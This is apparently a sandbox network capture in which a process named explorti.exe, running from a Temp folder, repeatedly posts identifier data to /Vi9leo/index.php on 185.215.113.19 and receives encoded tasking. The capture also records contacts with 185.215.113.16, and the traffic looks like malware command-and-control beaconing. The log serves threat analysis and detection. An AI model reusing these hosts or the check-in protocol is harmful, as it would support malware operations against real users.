                    Sep 1, 2024 17:37:02.680218935 CEST8049768185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.686595917 CEST8049768185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.686609030 CEST8049768185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.785115957 CEST4976980192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.790251017 CEST8049769185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.790338039 CEST4976980192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.790514946 CEST4976980192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.797772884 CEST8049769185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.797777891 CEST8049769185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.797856092 CEST4976980192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.797874928 CEST4976980192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.798883915 CEST4977080192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.808660030 CEST8049769185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.808666945 CEST8049769185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.809746027 CEST8049770185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.809844971 CEST4977080192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.809947968 CEST4977080192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.815577030 CEST8049770185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.815722942 CEST8049770185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.924355030 CEST4977180192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.930152893 CEST8049771185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.930259943 CEST4977180192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.930577993 CEST4977180192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.936052084 CEST8049771185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.936171055 CEST4977180192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.936199903 CEST4977180192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.936209917 CEST8049771185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.941620111 CEST4977280192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.941951036 CEST8049771185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.941955090 CEST8049771185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.947237015 CEST8049772185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.947345018 CEST4977280192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.947720051 CEST4977280192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.953206062 CEST8049772185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.953275919 CEST4977280192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.953298092 CEST4977280192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.953376055 CEST8049772185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.958304882 CEST8049772185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.960195065 CEST8049772185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:03.064680099 CEST4977380192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:03.069508076 CEST8049773185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:03.069639921 CEST4977380192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:03.069722891 CEST4977380192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:03.074884892 CEST8049773185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:03.074949980 CEST8049773185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:03.074959040 CEST4977380192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:03.074979067 CEST4977380192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:03.075608015 CEST4977480192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:03.079691887 CEST8049773185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:03.079751015 CEST8049773185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:03.080355883 CEST8049774185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:03.080462933 CEST4977480192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:03.080569029 CEST4977480192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:03.085536003 CEST8049774185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:03.085602045 CEST8049774185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:03.085612059 CEST4977480192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:03.085670948 CEST4977480192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:03.090384007 CEST8049774185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:03.090464115 CEST8049774185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:03.190901041 CEST4977580192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:03.197848082 CEST8049775185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:03.201803923 CEST4977580192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:03.201925993 CEST4977580192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:03.423065901 CEST4977580192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:03.459429026 CEST8049775185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:03.465229988 CEST8049775185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:04.208400965 CEST8049775185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:04.208528996 CEST4977580192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:04.228508949 CEST4977580192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:04.235399008 CEST8049775185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:04.604511976 CEST8049775185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:04.604634047 CEST4977580192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:04.612768888 CEST4977680192.168.2.4185.215.113.16
                    Sep 1, 2024 17:37:04.618133068 CEST8049776185.215.113.16192.168.2.4
                    Sep 1, 2024 17:37:04.618277073 CEST4977680192.168.2.4185.215.113.16
                    Sep 1, 2024 17:37:04.618339062 CEST4977680192.168.2.4185.215.113.16
                    Sep 1, 2024 17:37:04.629138947 CEST8049776185.215.113.16192.168.2.4
                    Sep 1, 2024 17:37:04.629221916 CEST8049776185.215.113.16192.168.2.4
                    Sep 1, 2024 17:37:04.629234076 CEST4977680192.168.2.4185.215.113.16
                    Sep 1, 2024 17:37:04.629261971 CEST4977680192.168.2.4185.215.113.16
                    Sep 1, 2024 17:37:04.634125948 CEST8049776185.215.113.16192.168.2.4
                    Sep 1, 2024 17:37:04.634130001 CEST8049776185.215.113.16192.168.2.4
                    Sep 1, 2024 17:37:09.642653942 CEST4977780192.168.2.4185.215.113.16
                    Sep 1, 2024 17:37:09.647595882 CEST8049777185.215.113.16192.168.2.4
                    Sep 1, 2024 17:37:09.647660017 CEST4977780192.168.2.4185.215.113.16
                    Sep 1, 2024 17:37:09.647792101 CEST4977780192.168.2.4185.215.113.16
                    Sep 1, 2024 17:37:09.653033018 CEST8049777185.215.113.16192.168.2.4
                    Sep 1, 2024 17:37:09.653094053 CEST4977780192.168.2.4185.215.113.16
                    Sep 1, 2024 17:37:09.653146029 CEST4977780192.168.2.4185.215.113.16
                    Sep 1, 2024 17:37:09.653322935 CEST8049777185.215.113.16192.168.2.4
                    Sep 1, 2024 17:37:09.658889055 CEST8049777185.215.113.16192.168.2.4
                    Sep 1, 2024 17:37:09.658934116 CEST8049777185.215.113.16192.168.2.4
                    Sep 1, 2024 17:37:14.666168928 CEST4977880192.168.2.4185.215.113.16
                    Sep 1, 2024 17:37:14.671020031 CEST8049778185.215.113.16192.168.2.4
                    Sep 1, 2024 17:37:14.671134949 CEST4977880192.168.2.4185.215.113.16
                    Sep 1, 2024 17:37:14.671273947 CEST4977880192.168.2.4185.215.113.16
                    Sep 1, 2024 17:37:14.676259995 CEST8049778185.215.113.16192.168.2.4
                    Sep 1, 2024 17:37:14.676343918 CEST4977880192.168.2.4185.215.113.16
                    Sep 1, 2024 17:37:14.676350117 CEST8049778185.215.113.16192.168.2.4
                    Sep 1, 2024 17:37:14.676434994 CEST4977880192.168.2.4185.215.113.16
                    Sep 1, 2024 17:37:14.681199074 CEST8049778185.215.113.16192.168.2.4
                    Sep 1, 2024 17:37:14.681252956 CEST8049778185.215.113.16192.168.2.4
                    Sep 1, 2024 17:37:19.694300890 CEST4977580192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:19.694664955 CEST4977980192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:19.840229034 CEST8049779185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:19.840432882 CEST4977980192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:19.841016054 CEST8049775185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:19.841089010 CEST4977580192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:19.984755039 CEST4977980192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:20.392621040 CEST4977980192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:20.470046043 CEST8049775185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:20.470242023 CEST4977580192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:20.829418898 CEST4977980192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:20.999885082 CEST8049779185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:21.001645088 CEST8049779185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:21.238028049 CEST8049775185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:21.238367081 CEST4977580192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:22.742021084 CEST8049775185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:22.742271900 CEST4977580192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:25.910119057 CEST8049775185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:25.910255909 CEST4977580192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:26.041918039 CEST4978380192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:26.046915054 CEST8049783185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:26.047753096 CEST4978380192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:26.051434040 CEST4978380192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:26.053261042 CEST8049783185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:26.053375006 CEST4978380192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:26.056291103 CEST8049783185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:26.058235884 CEST8049783185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:31.066652060 CEST4978480192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:31.071626902 CEST8049784185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:31.071747065 CEST4978480192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:31.071960926 CEST4978480192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:31.077183962 CEST8049784185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:31.077294111 CEST4978480192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:31.077339888 CEST4978480192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:31.077390909 CEST8049784185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:31.082335949 CEST8049784185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:31.082467079 CEST8049784185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:36.082941055 CEST4978580192.168.2.4185.215.113.16
                    Sep 1, 2024 17:37:37.094973087 CEST4978580192.168.2.4185.215.113.16
                    Sep 1, 2024 17:37:39.096740007 CEST4978580192.168.2.4185.215.113.16
                    Sep 1, 2024 17:37:45.099592924 CEST4978680192.168.2.4185.215.113.16
                    Sep 1, 2024 17:37:45.105638981 CEST8049786185.215.113.16192.168.2.4
                    Sep 1, 2024 17:37:45.105726957 CEST4978680192.168.2.4185.215.113.16
                    Sep 1, 2024 17:37:45.105902910 CEST4978680192.168.2.4185.215.113.16
                    Sep 1, 2024 17:37:45.111010075 CEST8049786185.215.113.16192.168.2.4
                    Sep 1, 2024 17:37:45.111093044 CEST8049786185.215.113.16192.168.2.4
                    Sep 1, 2024 17:37:50.127110004 CEST4978780192.168.2.4185.215.113.16
                    Sep 1, 2024 17:37:50.134917974 CEST8049787185.215.113.16192.168.2.4
                    Sep 1, 2024 17:37:50.135003090 CEST4978780192.168.2.4185.215.113.16
                    Sep 1, 2024 17:37:50.135140896 CEST4978780192.168.2.4185.215.113.16
                    Sep 1, 2024 17:37:50.141103029 CEST8049787185.215.113.16192.168.2.4
                    Sep 1, 2024 17:37:50.149878025 CEST8049787185.215.113.16192.168.2.4
                    Sep 1, 2024 17:37:55.160891056 CEST4978880192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:55.165735006 CEST8049788185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:55.165817022 CEST4978880192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:55.165942907 CEST4978880192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:55.170902014 CEST8049788185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:55.171444893 CEST8049788185.215.113.19192.168.2.4
                    Sep 1, 2024 17:38:00.174967051 CEST4978980192.168.2.4185.215.113.19
                    Sep 1, 2024 17:38:00.180916071 CEST8049789185.215.113.19192.168.2.4
                    Sep 1, 2024 17:38:00.181055069 CEST4978980192.168.2.4185.215.113.19
                    Sep 1, 2024 17:38:00.181507111 CEST4978980192.168.2.4185.215.113.19
                    Sep 1, 2024 17:38:00.187380075 CEST8049789185.215.113.19192.168.2.4
                    Sep 1, 2024 17:38:00.187433958 CEST4978980192.168.2.4185.215.113.19
                    Sep 1, 2024 17:38:00.187460899 CEST4978980192.168.2.4185.215.113.19
                    Sep 1, 2024 17:38:00.187541008 CEST8049789185.215.113.19192.168.2.4
                    Sep 1, 2024 17:38:00.193140030 CEST8049789185.215.113.19192.168.2.4
                    Sep 1, 2024 17:38:00.193149090 CEST8049789185.215.113.19192.168.2.4
                    Sep 1, 2024 17:38:05.192864895 CEST4979080192.168.2.4185.215.113.19
                    Sep 1, 2024 17:38:05.198832035 CEST8049790185.215.113.19192.168.2.4
                    Sep 1, 2024 17:38:05.199147940 CEST4979080192.168.2.4185.215.113.19
                    Sep 1, 2024 17:38:05.199372053 CEST4979080192.168.2.4185.215.113.19
                    Sep 1, 2024 17:38:05.204732895 CEST8049790185.215.113.19192.168.2.4
                    Sep 1, 2024 17:38:05.205365896 CEST8049790185.215.113.19192.168.2.4
                    • 185.215.113.19
                    • 185.215.113.16
                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.449763185.215.113.19808104C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Sep 1, 2024 17:37:02.370641947 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.449764185.215.113.19808104C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Sep 1, 2024 17:37:02.382051945 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 37 32 44 37 32 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A78B72D72B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.449765185.215.113.19808104C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Sep 1, 2024 17:37:02.508703947 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.449766185.215.113.19808104C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Sep 1, 2024 17:37:02.525935888 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 37 32 44 37 32 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A78B72D72B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.449767185.215.113.19808104C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Sep 1, 2024 17:37:02.651249886 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.449768185.215.113.19808104C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Sep 1, 2024 17:37:02.673691988 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 37 32 44 37 32 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A78B72D72B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    6192.168.2.449769185.215.113.19808104C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Sep 1, 2024 17:37:02.790514946 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    7192.168.2.449770185.215.113.19808104C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Sep 1, 2024 17:37:02.809947968 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 37 32 44 37 32 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A78B72D72B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    8192.168.2.449771185.215.113.19808104C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Sep 1, 2024 17:37:02.930577993 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    9192.168.2.449772185.215.113.19808104C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Sep 1, 2024 17:37:02.947720051 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 37 32 44 37 32 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A78B72D72B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    10192.168.2.449773185.215.113.19808104C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Sep 1, 2024 17:37:03.069722891 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    11192.168.2.449774185.215.113.19808104C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Sep 1, 2024 17:37:03.080569029 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 37 32 44 37 32 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A78B72D72B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    12192.168.2.449775185.215.113.19808104C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Sep 1, 2024 17:37:03.201925993 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 1, 2024 17:37:03.423065901 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 1, 2024 17:37:04.208400965 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 01 Sep 2024 15:37:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 1, 2024 17:37:04.228508949 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 37 32 44 37 32 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A78B72D72B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Sep 1, 2024 17:37:04.604511976 CEST466INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 01 Sep 2024 15:37:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 31 31 33 0d 0a 20 3c 63 3e 31 30 30 30 30 35 31 30 30 30 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 64 30 32 34 36 62 35 63 62 34 66 36 35 32 32 34 32 37 66 61 65 31 64 61 61 38 65 39 65 62 34 66 66 66 37 62 35 63 36 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 30 30 30 35 32 30 30 30 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 64 30 32 34 36 62 35 63 62 34 66 36 35 32 32 34 32 37 66 61 65 31 64 61 61 38 65 39 65 62 34 66 66 66 37 62 35 63 36 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 30 30 30 35 33 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 64 30 32 34 36 62 35 63 62 34 66 36 35 32 32 34 32 37 66 61 65 31 64 61 61 38 65 39 65 62 30 65 65 66 65 62 38 38 34 36 64 39 33 34 66 34 38 62 31 35 65 61 61 34 39 35 63 34 39 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
